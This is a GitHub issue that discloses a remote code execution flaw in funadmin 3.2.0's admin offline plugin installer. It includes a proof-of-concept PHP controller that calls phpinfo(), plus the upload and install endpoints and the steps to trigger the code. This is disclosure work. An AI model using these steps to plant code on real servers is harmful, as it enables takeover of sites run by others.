Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Background offline installation plug-in rce #7

Closed
qbz95aaa opened this issue Jan 29, 2023 · 1 comment
Closed

Background offline installation plug-in rce #7

qbz95aaa opened this issue Jan 29, 2023 · 1 comment

Comments

@qbz95aaa
Copy link

qbz95aaa commented Jan 29, 2023

Vulnerability Product:funadmin
Vulnerability version:.3.2.0
Vulnerability type:romote code exec
Vulnerability Details:
Background offline installation plug-in rce
Vulnerability location occurs in app\backend\controller\Addon.php#installation plug-in does not filter malicious code
image
Therefore, we can construct a malicious plug-in controller to cause remote code execution
Construct the tarball
snowflake\controller\Index.php executes malicious code here I call phpinfo();
`<?php

namespace addons\snowflake\controller;

use fun\addons\Controller;
use think\App;

class Index extends Controller
{

//首页
public function index()
{
	phpinfo();

     echo hook_one('snowflake');
}

}`
image
After the construction of the compressed package is completed, the background plug-in-plugin management-offline installation uploads the malicious compressed package
http://192.168.3.129:8092/backend/ajax/uploads?save=1&path=addon
http://192.168.3.129:8092/backend/addon/localinstall
image
image

Visit after successful installation
http://192.168.3.129:8092/addons/snowflake
Successfully trigger our malicious code
image

@qbz95aaa
Copy link
Author

find by Chaitin Security Research Lab

@funadmin funadmin closed this as completed May 5, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants